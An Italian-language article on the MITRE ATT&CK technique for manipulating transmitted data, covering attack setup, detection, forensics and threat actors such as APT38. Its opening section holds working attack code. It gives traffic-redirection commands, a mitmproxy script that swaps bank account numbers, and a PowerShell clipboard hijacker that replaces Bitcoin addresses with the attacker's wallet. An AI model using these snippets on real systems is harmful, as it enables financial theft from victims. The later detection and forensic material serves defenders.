Data Hijacking: Transmitted Data Manipulation (T1565.002)

Iniziamo con l'intercettazione base su Linux utilizzando iptables per redirigere il traffico. Il comando iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443 devia le connessioni HTTPS verso un proxy locale. Per Windows, netsh offre funzionalità simili con netsh interface portproxy add v4tov4 listenport=8443 connectaddress=target.com connectport=443.

La manipolazione vera e propria richiede un proxy MITM come mitmproxy. Su Linux: mitmdump -s modify_script.py -p 8443 --ssl-insecure dove modify_script.py contiene la logica di alterazione. Un esempio pratico sostituisce numeri di conto bancario nei POST HTTP:

def response(flow):
    if "transfer" in flow.request.path:
        flow.response.text = flow.response.text.replace("ACC123456", "ACC666666")

Per replicare l'attacco clipboard di Metamorfo su Windows, monitora e sostituisci con PowerShell. Il seguente snippet intercetta indirizzi Bitcoin:

while($true){$clip = Get-Clipboard; if($clip -match '^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$'){Set-Clipboard 'TUO_WALLET_BTC'}; Start-Sleep -Milliseconds 500}

Su macOS, pbpaste e pbcopy permettono manipolazioni simili. Per intercettare email come LightNeuron, configura un Transport Agent su Exchange che altera i messaggi. Il componente critico è timing: la manipolazione deve essere istantanea per non destare sospetti.

La detection efficace richiede correlazione tra Sysmon EventCode 3 (connessioni di rete) e EventCode 15 (alterazioni file). Monitora processi che stabiliscono connessioni e simultaneamente accedono a file temporanei, pattern tipico dei proxy MITM.

Su Linux, auditd cattura syscall critiche. La regola -a always,exit -S send,recv,write -k data_manipulation logga operazioni di I/O di rete. Correla con hash mismatch: calcola SHA256 dei file prima dell'invio e dopo la ricezione, divergenze indicano manipolazione.

Il monitoraggio clipboard richiede approccio behavior-based. Cerca processi non-browser che chiamano GetClipboardData ad alta frequenza. In Windows, WMI query su Win32_Process dove CommandLine contiene "clip" o processi che importano user32.dll senza GUI visibile sono red flag immediati.

Per email, configura transport rule che calcola hash del contenuto. Se l'hash del messaggio in Sent Items differisce da quello in destinazione, scatta l'alert. Zeek può identificare downgrade TLS con lo script detect-ssl-version-downgrade.zeek, sintomo di tentativo di intercettazione.

I falsi positivi derivano principalmente da proxy aziendali legittimi. Mantieni whitelist di IP/processi autorizzati ma verifica periodicamente. Latenza anomala nelle transazioni (>500ms rispetto baseline) spesso indica manipolazione in corso.

L'artefatto chiave su Windows è il registro HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, che rivela modifiche alle route di rete. Timestamp delle chiavi indicano quando è iniziata la redirezione del traffico.

Memory forensics con Volatility identifica hook nelle funzioni di rete. Il plugin ssdt mostra System Service Descriptor Table modifications, mentre callbacks rivela notify routines installate per intercettare I/O. Process hollowing lascia tracce in VAD (Virtual Address Descriptor) con permessi RWX anomali.

Su Linux, /proc/net/tcp e /proc/net/tcp6 mostrano connessioni attive con timestamp. Confronta con /var/log/secure per correlate modifiche iptables. File in /tmp con pattern come .mitm, .proxy spesso contengono log di debug degli attaccanti.

APT38 lasciava tracce nei log SWIFT di modifiche last-minute ai campi beneficiario. Cerca anomalie nei Message Sequence Numbers o timestamp che non corrispondono al normale flusso operativo. Print spooler logs rivelano discrepanze tra quanto inviato e quanto stampato.

La timeline si costruisce correlando: modifica configurazione rete → installazione proxy/hook → prime manipolazioni test → manipolazioni production → cleanup. Preserva RAM dumps immediati, la manipolazione live lascia poche tracce su disco.

APT38/Lazarus rimane l'unico gruppo APT documentato per questa tecnica, specializzandosi nel settore finanziario. Il loro tool DYEPACK intercetta specificamente messaggi SWIFT diretti alle stampanti, alterando i dettagli delle transazioni per nascondere i trasferimenti fraudolenti.

Il gruppo mostra pattern operativi consistenti: reconnaissance prolungata (3-6 mesi) per comprendere i processi bancari, deployment durante weekend/festività quando il monitoring è ridotto, e manipolazione chirurgica solo di campi critici per evitare detection da controlli di integrità basilari.

L'overlap con tool di Turla è significativo. LightNeuron condivide architettura modulare con altri implant del gruppo, suggerendo possibile condivisione di codice o sviluppatori comuni nel circuito criminale dell'Est Europa. La variante Linux mai rilasciata indica capacità cross-platform.

I trojan bancari brasiliani Metamorfo e Melcoz rappresentano l'evoluzione criminale locale. Focalizzati su cryptocurrency, dimostrano come la tecnica si adatti a nuovi payment systems. Il salto da phishing tradizionale a manipolazione real-time indica maturazione dell'ecosistema criminale latinoamericano.

Prevediamo espansione verso payment processor API e blockchain bridges. La crescente adozione di instant payment systems crea nuove opportunità. APT38 potrebbe mirare a SWIFT gpi (global payments innovation) che promette tracciabilità end-to-end ma introduce nuovi vettori di manipolazione.

MITRE ATT&CK Framework - T1565.002. FireEye, "APT38: Un-usual Suspects", October 2018, dettagli su DYEPACK e manipolazione SWIFT. DOJ, "United States v. Park Jin Hyok", 2018, caso legale attacco Sony. ESET, "LightNeuron: A Backdoor Targeting Microsoft Exchange Servers", May 2019, architettura malware email. Fortinet, "Metamorfo Banking Trojan", February 2020, tecniche clipboard hijacking.